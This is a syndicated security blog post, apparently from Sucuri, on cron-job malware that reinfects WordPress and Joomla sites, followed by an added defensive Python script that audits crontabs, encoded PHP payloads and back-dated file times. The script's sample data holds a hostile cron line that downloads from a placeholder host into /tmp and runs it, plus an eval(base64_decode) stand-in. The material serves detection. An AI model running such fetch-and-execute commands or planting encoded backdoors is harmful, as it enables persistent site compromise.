We recently had a client with a persistent malware infection on their shared hosting environment that would re-infect the files shortly after we had cleaned them. The persistence was created by a cron job scheduled to download malware from a third-party domain.
This persistent website malware infection reminded us of a blog post we published back in 2014. As it turns out, the malware operates almost identically, and in this more recent case it was infecting a WordPress website. The malware is configured to detect WordPress and Joomla based on their directory structures:
Once the malware has determined whether the website is using Joomla or WordPress, it selects the method it will use to further infect the website's files.
In this case, our client's website was using WordPress. The malware first preserves the existing timestamps of the default WordPress plugin "Hello, Dolly", then attempts to hide base64-encoded malware in the plugin file ./wp-content/plugins/hello.php:
Of course, the backup backdoor cron job has been set up so that, in the event the website owner were to clean their website's files or even restore from a backup, they would still be reinfected:
Over the past 5-8 years it looks like the malware operators have switched from distributing the malware from the old domain hestonsflorist[.]com to the current one at hestonsflorists[.]com. Apart from this particular detail, their cron commands are almost identical to the malicious cron we found back in 2014.
The attackers even assign the same fake timestamp (201104202045) using touch to try to trick webmasters, which nowadays would probably be even more suspicious, since the fake timestamp reflects a date over 8 years old.
In this particular infection, malicious files are served from the /tmp directory, which is rarely scanned or monitored and makes the infection difficult to detect.
Because many website owners are simply not aware of the cron jobs set to run on their hosting account, this type of backdoor can be very persistent and prove frustrating, as the website will never be safe until the malicious cron is removed.
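The checks below are an added example for site owners auditing a hosting account for the pattern described in this post; they are not code from Sucuri or from the original post. The script flags crontab entries that fetch from an external URL or run files out of a temp directory, looks for eval/base64 decoding and long base64 runs that decode to PHP in a plugin file, and detects a back-dated modification time by comparing it with the file's change time (touch rewrites mtime, but the kernel updates ctime). The crontab text, plugin source, domain and paths are constructed placeholders; the 201104202045 timestamp is the one quoted above.

```python
"""Defender-side checks for cron-based reinfection: suspicious crontab
entries, encoded payloads in a plugin file, and back-dated timestamps.
Added example; all sample data is constructed, not taken from a real incident."""
import base64
import binascii
import calendar
import os
import re
import tempfile
import time

# Constructed sample crontab: two benign entries and one suspicious one.
# The domain is a placeholder, not the one named in the post.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/php /home/site/public_html/wp-cron.php >/dev/null 2>&1
30 3 * * 0 /home/site/bin/backup.sh
*/15 * * * * wget -q -O /tmp/.x http://payload-host.example/p ; sh /tmp/.x
"""

FETCH_TOOL = re.compile(r"\b(wget|curl|fetch|lynx)\b")
EXTERNAL_URL = re.compile(r"https?://[^\s'\";|&]+")
TEMP_DIR = re.compile(r"(?:^|[\s=;|&'\"])/(?:tmp|var/tmp|dev/shm)/")
RUN_FROM_TEMP = re.compile(r"\b(?:sh|bash|perl|php|python)\s+/(?:tmp|var/tmp|dev/shm)/")


def audit_crontab(text):
    """Return [(line_no, [reason, ...])] for crontab lines worth reviewing."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        cmd = line.strip()
        if not cmd or cmd.startswith("#"):
            continue
        reasons = []
        if FETCH_TOOL.search(cmd) and EXTERNAL_URL.search(cmd):
            reasons.append("fetches content from an external URL")
        if TEMP_DIR.search(cmd):
            reasons.append("references a temp directory")
        if RUN_FROM_TEMP.search(cmd):
            reasons.append("executes a file from a temp directory")
        if reasons:
            findings.append((no, reasons))
    return findings


# Constructed stand-in for a modified Hello Dolly file: the legitimate header
# followed by an appended eval(base64_decode(...)) line. The encoded text is an
# innocuous placeholder, not a real payload.
_PLACEHOLDER_PHP = (b"<?php /* constructed placeholder, not a real payload */ "
                    b"if (isset($_GET['k'])) { echo 'placeholder'; } ?>")
SAMPLE_PLUGIN = (
    "<?php\n/*\nPlugin Name: Hello Dolly\n*/\n"
    "function hello_dolly() { echo 'Hello, Dolly'; }\n"
    "eval(base64_decode('" + base64.b64encode(_PLACEHOLDER_PHP).decode() + "'));\n"
)

BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")
DECODE_CALL = re.compile(r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
PHP_MARKERS = (b"<?php", b"eval(", b"system(", b"$_GET", b"$_POST", b"$_REQUEST")


def find_encoded_payloads(source):
    """Flag decode/eval calls and base64 runs that decode to PHP-looking code."""
    hits = []
    for m in DECODE_CALL.finditer(source):
        hits.append((m.start(), "calls %s()" % m.group(1)))
    for m in BASE64_RUN.finditer(source):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, ignore
        if any(marker in decoded for marker in PHP_MARKERS):
            hits.append((m.start(), "base64 run decodes to PHP-like code"))
    return sorted(hits)


def mtime_backdated(path, tolerance=3600):
    """True when mtime trails ctime by more than `tolerance` seconds.

    touch -t rewrites mtime but the kernel bumps ctime, so a back-dated
    file shows an mtime far behind its ctime (Linux ctime semantics assumed)."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > tolerance


def demo_backdate(fake_stamp="201104202045"):
    """Create a temp file, back-date it as `touch -t` would, and check it.
    Returns (result_before_backdating, result_after_backdating)."""
    t = calendar.timegm(time.strptime(fake_stamp, "%Y%m%d%H%M"))
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        fresh = mtime_backdated(path)     # freshly created: mtime == ctime
        os.utime(path, (t, t))            # same effect on mtime as touch -t
        backdated = mtime_backdated(path)
    finally:
        os.unlink(path)
    return fresh, backdated


if __name__ == "__main__":
    for no, reasons in audit_crontab(SAMPLE_CRONTAB):
        print("crontab line %d: %s" % (no, "; ".join(reasons)))
    for pos, why in find_encoded_payloads(SAMPLE_PLUGIN):
        print("plugin offset %d: %s" % (pos, why))
    print("backdate demo (fresh, backdated):", demo_backdate())
```

To run this against a real account, feed the output of `crontab -l` to `audit_crontab`, the contents of each plugin file to `find_encoded_payloads`, and each file path to `mtime_backdated`; the ctime comparison is the useful part, because the preserved or faked mtime the post describes is exactly what a plain directory listing shows.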
*** This is a Security Bloggers Network syndicated blog from Sucuri Blog authored by Luke Leal. Read the original post at: https://blog.sucuri.net/2019/05/return-to-the-city-of-cron-malware-infections-on-joomla-and-wordpress.html